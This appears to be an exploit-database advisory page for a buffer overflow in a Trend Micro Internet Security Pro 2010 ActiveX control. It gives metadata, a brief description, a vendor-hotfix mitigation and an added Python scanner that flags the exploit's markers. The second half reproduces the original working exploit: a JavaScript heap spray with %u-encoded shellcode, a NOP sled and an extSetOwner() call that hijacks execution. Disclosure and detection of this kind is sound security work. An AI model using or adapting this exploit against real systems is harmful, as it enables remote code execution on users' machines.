Vendor: Internet Security Pro 2010
By: Dr_IDE
CVSS: 9,3 HIGH
Remote Code Execution
CWE: 119
Product Name: Internet Security Pro 2010
Affected Version From: 17.50.0.1366
Affected Version To: 17.50.0.1647
Patch Exists: YES
Related CWE: N/A
CPE: a:trend_micro:internet_security_pro_2010
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Trend Micro Internet Security Pro 2010 ActiveX Unicode Remote Exploit

This exploit targets a remote code execution vulnerability in the Trend Micro Internet Security Pro 2010 ActiveX control. The vulnerability is caused by a buffer overflow in the UfPBCtrl.DLL component and is triggered when a specially crafted malicious script runs in the browser. The script carries shellcode that executes arbitrary code on the vulnerable system. The exploit code is written in JavaScript and uses the extSetOwner() method of the vulnerable ActiveX control to overwrite the return address of the stack frame with the address of the shellcode.

Mitigation:

The vendor has released a hotfix to address this vulnerability. Users should update their Trend Micro Internet Security Pro 2010 to the latest version.
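
The proof of concept on this page leaves three markers in clear text: the control's CLSID, a call to extSetOwner(), and %u-encoded strings passed to unescape(). The static scanner below is an added example, not part of the original exploit or of any vendor tooling; scan_page(), verdict(), the triage labels and the sample page are constructed for illustration.

```python
import re

# CLSID and method name as they appear in the proof of concept on this page.
CLSID = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
METHOD = "extSetOwner"

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ID_ATTR = re.compile(r"""\bid\s*=\s*["']?([\w$]+)""", re.I)
PCT_U_RUN = re.compile(r"(?:%u[0-9a-f]{4}){2,}", re.I)

def scan_page(html):
    """Collect static indicators from one HTML document (hypothetical helper)."""
    ids = []
    for tag in OBJECT_TAG.findall(html):
        # Remove whitespace so a classid wrapped across lines still matches.
        if CLSID.lower() in re.sub(r"\s+", "", tag).lower():
            m = ID_ATTR.search(tag)
            ids.append(m.group(1) if m else None)
    # Only count calls made on an element that instantiates the control.
    calls = [i for i in ids if i and
             re.search(re.escape(i) + r"\s*\.\s*" + METHOD + r"\s*\(", html)]
    runs = PCT_U_RUN.findall(html)
    return {
        "object_ids": ids,
        "method_calls": calls,
        "pct_u_units": sum(len(r) // 6 for r in runs),  # each %uXXXX is 6 chars
        "nop_fill": any("%u9090" in r.lower() for r in runs),
    }

def verdict(f):
    """Map findings to a triage label (labels are this example's own)."""
    if not f["object_ids"]:
        return "clean"
    if not f["method_calls"]:
        return "review"  # control instantiated, method not called in clear text
    return "high" if f["nop_fill"] else "suspicious"

# Constructed sample: inert placeholder values, no payload.
SAMPLE = """<object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061-
043D9CEC52F0'></object>
<script>
fill = unescape('%u9090%u9090');
target.extSetOwner(unescape('%u4141%u4141'));
</script>"""

if __name__ == "__main__":
    found = scan_page(SAMPLE)
    print(found, verdict(found))
```

Static matching only sees markup that references the control in clear text, so it complements the vendor update rather than replacing it.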

Exploit-DB raw data:

#########################################################################

<!--
Title: 		Trend Micro Internet Security Pro 2010 ActiveX Unicode Remote Exploit
Version:	UfPBCtrl.DLL ver 17.50.0.1366 (XPSP3 English)
Version:    UfPBCtrl.dll ver 17.50.0.1647 (XPSP3 English) -- Hotfix release
Coded By:	Dr_IDE
Credits:	Abyssec
Tested:		XPSP3 English + IE7
Link:		www.trendmicro.com
Notes:		I only researched/posted this because the original did not work for me. Perhaps it's a Windows language thing?
Notes:		If you want to try this locally you need to disable the "Protection Against Viruses & Spyware" option.
-->

<object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061-043D9CEC52F0'></object>
<script>

//payload is windows/exec cmd=calc.exe

shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
                       
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;

while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);

while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();

for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;

target.extSetOwner(unescape('%u50A1%u00C7'));
//IEFRAME.DLL [0x00c750a6] = 0a0a0a0a (perfect?), we send just behind it

</script>

<!--[pocoftheday.blogspot.com]-->